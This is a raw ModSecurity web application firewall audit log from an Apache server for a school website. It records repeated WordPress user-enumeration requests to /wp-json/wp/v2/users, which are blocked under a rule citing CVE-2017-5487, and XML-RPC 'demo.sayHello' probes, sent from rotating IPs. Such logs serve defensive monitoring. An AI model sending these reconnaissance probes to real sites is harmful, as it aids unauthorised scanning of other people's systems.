in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746840903592189 2805 (- - -) Stopwatch2: 1746840903592189 2805; combined=1288, p1=435, p2=823, p3=0, p4=0, p5=30, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9152392e-Z-- --2d7b0874-A-- [10/May/2025:08:35:11 +0700] aB6tTxLuBiaF9R054QBbAwAAAAk 103.236.140.4 53780 103.236.140.4 8181 --2d7b0874-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.96.111 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.96.111 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --2d7b0874-C-- demo.sayHello --2d7b0874-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --2d7b0874-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746840911345429 6918 (- - -) Stopwatch2: 1746840911345429 6918; combined=4922, p1=626, p2=4035, p3=42, p4=43, p5=103, sr=90, sw=73, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2d7b0874-Z-- --0cf08e68-A-- [10/May/2025:08:35:20 +0700] aB6tWBLuBiaF9R054QBbBAAAAAg 103.236.140.4 53784 103.236.140.4 8181 --0cf08e68-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.101.241 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.101.241 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --0cf08e68-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0cf08e68-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746840920760274 3296 (- - -) Stopwatch2: 1746840920760274 3296; combined=1467, p1=481, p2=898, p3=0, p4=0, p5=88, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0cf08e68-Z-- --e2e70d62-A-- [10/May/2025:08:35:29 +0700] aB6tYRLuBiaF9R054QBbBgAAAAo 103.236.140.4 53790 103.236.140.4 8181 --e2e70d62-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.101.241 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.101.241 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --e2e70d62-C-- demo.sayHello --e2e70d62-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --e2e70d62-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746840929624335 5616 (- - -) Stopwatch2: 1746840929624335 5616; combined=4240, p1=528, p2=3497, p3=29, p4=31, p5=91, sr=71, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e2e70d62-Z-- --3e907d1f-A-- [10/May/2025:08:35:44 +0700] aB6tcNr9PbfRBMhzxmRazwAAAFY 103.236.140.4 53800 103.236.140.4 8181 --3e907d1f-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.184.153 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.184.153 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --3e907d1f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3e907d1f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746840944845458 2792 (- - -) Stopwatch2: 1746840944845458 2792; combined=1247, p1=429, p2=788, p3=0, p4=0, p5=30, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3e907d1f-Z-- --a6aabd0e-A-- [10/May/2025:08:35:57 +0700] aB6tfdr9PbfRBMhzxmRa0QAAAFc 103.236.140.4 53808 103.236.140.4 8181 --a6aabd0e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.184.153 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.184.153 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --a6aabd0e-C-- demo.sayHello --a6aabd0e-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --a6aabd0e-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746840957692809 5946 (- - -) Stopwatch2: 1746840957692809 5946; combined=4330, p1=602, p2=3450, p3=30, p4=84, p5=96, sr=122, sw=68, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a6aabd0e-Z-- --01259373-A-- [10/May/2025:08:36:01 +0700] aB6tgRLuBiaF9R054QBbCgAAABM 103.236.140.4 53810 103.236.140.4 8181 --01259373-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.204.171 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.204.171 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --01259373-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --01259373-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746840961629806 2976 (- - -) Stopwatch2: 1746840961629806 2976; combined=1335, p1=530, p2=780, p3=0, p4=0, p5=25, sr=86, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --01259373-Z-- --366a7132-A-- [10/May/2025:08:36:07 +0700] aB6th9r9PbfRBMhzxmRa1AAAAEA 103.236.140.4 53816 103.236.140.4 8181 --366a7132-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.204.171 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.204.171 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --366a7132-C-- demo.sayHello --366a7132-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --366a7132-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746840967711824 4462 (- - -) Stopwatch2: 1746840967711824 4462; combined=3532, p1=466, p2=2871, p3=22, p4=23, p5=88, sr=110, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --366a7132-Z-- --e1c82563-A-- [10/May/2025:08:36:51 +0700] aB6ts9r9PbfRBMhzxmRa1gAAAEE 103.236.140.4 53820 103.236.140.4 8181 --e1c82563-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.249.58.152 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.58.152 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --e1c82563-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e1c82563-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746841011889538 3088 (- - -) Stopwatch2: 1746841011889538 3088; combined=1330, p1=487, p2=813, p3=0, p4=0, p5=29, sr=124, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e1c82563-Z-- --86a46460-A-- [10/May/2025:08:37:00 +0700] aB6tvNr9PbfRBMhzxmRa2AAAAEU 103.236.140.4 53824 103.236.140.4 8181 --86a46460-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.249.58.152 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.58.152 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --86a46460-C-- demo.sayHello --86a46460-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --86a46460-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746841020992568 4932 (- - -) Stopwatch2: 1746841020992568 4932; combined=3872, p1=438, p2=3214, p3=31, p4=35, p5=91, sr=67, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --86a46460-Z-- --61342a57-A-- [10/May/2025:08:42:01 +0700] aB6u6ci6w7GTj2w44Z6cKAAAANQ 103.236.140.4 53854 103.236.140.4 8181 --61342a57-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.114.140 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.114.140 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --61342a57-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --61342a57-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746841321797486 3259 (- - -) Stopwatch2: 1746841321797486 3259; combined=1387, p1=471, p2=884, p3=0, p4=0, p5=31, sr=78, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --61342a57-Z-- --d4d4117e-A-- [10/May/2025:08:42:06 +0700] aB6u7hLuBiaF9R054QBbDwAAAAU 103.236.140.4 53858 103.236.140.4 8181 --d4d4117e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.114.140 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.114.140 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --d4d4117e-C-- demo.sayHello --d4d4117e-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --d4d4117e-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746841326526155 5545 (- - -) Stopwatch2: 1746841326526155 5545; combined=4129, p1=537, p2=3342, p3=28, p4=32, p5=124, sr=71, sw=66, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d4d4117e-Z-- --064c6079-A-- [10/May/2025:08:42:44 +0700] aB6vFBLuBiaF9R054QBbEgAAAAg 103.236.140.4 53868 103.236.140.4 8181 --064c6079-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.37.118 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.37.118 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --064c6079-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --064c6079-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746841364981998 2835 (- - -) Stopwatch2: 1746841364981998 2835; combined=1418, p1=489, p2=898, p3=0, p4=0, p5=31, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --064c6079-Z-- --b0cc8b18-A-- [10/May/2025:08:42:51 +0700] aB6vG8i6w7GTj2w44Z6cKgAAAMQ 103.236.140.4 53872 103.236.140.4 8181 --b0cc8b18-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.37.118 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.37.118 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --b0cc8b18-C-- demo.sayHello --b0cc8b18-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --b0cc8b18-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746841371838275 5869 (- - -) Stopwatch2: 1746841371838275 5869; combined=4322, p1=499, p2=3597, p3=28, p4=32, p5=97, sr=72, sw=69, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b0cc8b18-Z-- --06abd420-A-- [10/May/2025:08:49:17 +0700] aB6wnRLuBiaF9R054QBbFgAAAA0 103.236.140.4 53902 103.236.140.4 8181 --06abd420-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 154.79.248.178 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.79.248.178 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --06abd420-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --06abd420-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746841757966728 3501 (- - -) Stopwatch2: 1746841757966728 3501; combined=1435, p1=492, p2=910, p3=0, p4=0, p5=33, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --06abd420-Z-- --cd5ddc3a-A-- [10/May/2025:08:57:24 +0700] aB6yhBLuBiaF9R054QBbHQAAAAM 103.236.140.4 53964 103.236.140.4 8181 --cd5ddc3a-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 162.214.169.173 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 162.214.169.173 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --cd5ddc3a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cd5ddc3a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746842244923688 2894 (- - -) Stopwatch2: 1746842244923688 2894; combined=1309, p1=433, p2=848, p3=0, p4=0, p5=28, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cd5ddc3a-Z-- --a650e279-A-- [10/May/2025:09:08:11 +0700] aB61C9r9PbfRBMhzxmRa5QAAAEg 103.236.140.4 54038 103.236.140.4 8181 --a650e279-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.79.144 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.79.144 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --a650e279-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a650e279-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746842891155494 2848 (- - -) Stopwatch2: 1746842891155494 2848; combined=1297, p1=431, p2=834, p3=0, p4=0, p5=32, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
